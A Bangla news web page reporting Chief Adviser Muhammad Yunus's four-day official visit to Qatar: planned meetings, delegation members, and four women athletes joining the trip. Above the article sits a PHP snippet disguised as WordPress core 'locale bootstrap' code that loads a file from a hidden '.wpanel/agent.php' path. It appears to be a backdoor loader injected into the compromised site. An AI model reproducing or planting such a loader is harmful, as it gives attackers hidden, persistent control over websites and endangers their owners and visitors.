// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } } চার দিনের সরকারি সফরে আজ কাতার যাচ্ছেন প্রধান উপদেষ্টা । - www.htbanglatv.com চার দিনের সরকারি সফরে আজ কাতার যাচ্ছেন প্রধান উপদেষ্টা । - www.htbanglatv.com
শিরোনাম
তালায় মাদকের তথ্য দেওয়ায় গ্রাম পুলিশকে পেটাল মাদক কারবারিরা, জিডি চন্দনাইশে খুনিয়া পাড়া ইয়াং সোসাইটির অলিম্পিক ফুটবল টুর্নামেন্টের উদ্বোধন  পোরশায় মাদকবিরোধী অভিযানে ০১ জন পেশাদার খুচরা মাদক ব্যবসায়ী গ্রেফতার-২৫০ গ্রাম গাঁজা জব্দ।  ইন্দোরে শুরু হলো ১৮তম ভারতীয় সাংবাদিকতা উৎসব ২০২৬: মূল ভাবনা ‘জেন-জি’, সম্মানিত সংবাদমাধ্যমের কিংবদন্তিরা। পোরশায় আদিবাসী সমাবেশ ও ত্রি-বার্ষিক সমাবেশ ২০২৬ অনুষ্ঠিত।     নীলফামারীতে বিজিবির অভিযানে ১৮ পিস ইয়াবাসহ শীর্ষ মাদক ব্যবসায়ী আটক শিক্ষার গুণগত মানোন্নয়নের লক্ষে নিতপুর দারুস সুন্নাহ সিনিয়র ফাজিল মাদ্রাসায় এক মা সমাবেশ ২০২৬ অনুষ্ঠিত।  হাজরাকাটি ব্লাড ডোনার্স ক্লাবের ১ম প্রতিষ্ঠাবার্ষিকীতে বিনামূল্যে রক্তের গ্রুপ নির্ণয় ও আলোচনা সভা পোরশা উপজেলায় নতুন গাইনী ডাক্তারের যোগদান , রোগীদের পাশে থাকার অঙ্গীকার লালমনিরহাট ও ডিমলায় বিজিবির অভিযানে ১৭ লাখ টাকার চুইঝাল ও কাঠ জব্দ
বুধবার, ০৭ অক্টোবর ২০২৬, ০৬:২৯ পূর্বাহ্ন

চার দিনের সরকারি সফরে আজ কাতার যাচ্ছেন প্রধান উপদেষ্টা ।

রিপোটারের নাম / ৩৪৯ বার পড়া হয়েছে
প্রকাশের সময় : সোমবার, ২১ এপ্রিল, ২০২৫

 

এইচটি বাংলা ডেস্ক : চার দিনের সরকারি সফরে আজ (সোমবার) কাতার যাচ্ছেন প্রধান উপদেষ্টা অধ্যাপক ড. মুহাম্মদ ইউনূস।

 

 

প্রধান উপদেষ্টার উপপ্রেস সচিব আবুল কালাম আজাদ মজুমদার জানান, কাতারের আমির শেখ তামিম বিন হামাদ আল-থানির আমন্ত্রণে এ সফরে যাচ্ছেন অধ্যাপক ইউনূস।

 

তিনি বলেন, প্রধান উপদেষ্টা কাতারের রাজধানী দোহারে অনুষ্ঠিত হতে যাওয়া ‘আর্থ সামিট-২০২৫’ এ অংশ নেবেন। পাশাপাশি কাতারের আমিরের সঙ্গে তার বৈঠক হওয়ার সম্ভাবনা রয়েছে।

 

 

জানা গেছে, সম্মেলনে যোগ দেওয়ার উপলক্ষে সফরটি হলেও মূল লক্ষ্য কাতারের সঙ্গে দ্বিপক্ষীয় সম্পর্ক নিয়ে আলোচনা করা। এ ক্ষেত্রে কাতারের আমিরের সঙ্গে প্রধান উপদেষ্টার সম্ভাব্য বৈঠকে দুই দেশের সম্পর্কের ভবিষ্যৎ, এলএনজি আমদানি, বাণিজ্য, বিনিয়োগ, কর্মসংস্থান, মধ্যপ্রাচ্য পরিস্থিতি ও রোহিঙ্গা সংকট ও সমাধান নিয়ে আলোচনা হতে পারে।

 

এ ছাড়া ড. ইউনূস কাতার ফাউন্ডেশন পরিদর্শন ও ফাউন্ডেশনের চেয়ারপার্সন মোজা বিনতে নাসেরের সঙ্গে বৈঠক, কাতারের জ্বালানি প্রতিমন্ত্রী সাদ বিন সেরিদা আল কাবিরের সঙ্গে সাক্ষাৎ এবং কাতারভিত্তিক আন্তর্জাতিক সংবাদমাধ্যম আল-জাজিরার প্রধান অফিস পরিদর্শনে গিয়ে ঊর্ধ্বতন কর্মকর্তাদের সঙ্গে বৈঠক করার পাশাপাশি একটি সাক্ষাৎকার দেওয়ার কথা রয়েছে।

 

চার দিনের এই সফরে প্রধান উপদেষ্টার সঙ্গে পররাষ্ট্র উপদেষ্টা মো. তৌহিদ হোসেন, জ্বালানি উপদেষ্টা মুহাম্মদ ফাওজুল কবির খান এবং শিল্প উপদেষ্টা আদিলুর রহমান খান সফরসঙ্গী হিসেবে থাকবেন।

 

 

এ ছাড়া দেশের ইতিহাসে প্রথমবারের মতো বাংলাদেশের চারজন জাতীয় নারী ক্রীড়াবিদ (ফুটবলার আফিদা খন্দকার ও শাহেদা আখতার রিপা এবং ক্রিকেটার সুমাইয়া আখতার ও শারমিন সুলতানা) প্রধান উপদেষ্টার সফরসঙ্গী হিসেবে কাতারে যাচ্ছেন।

 


এই ক্যাটাগরির আরো সংবাদ

;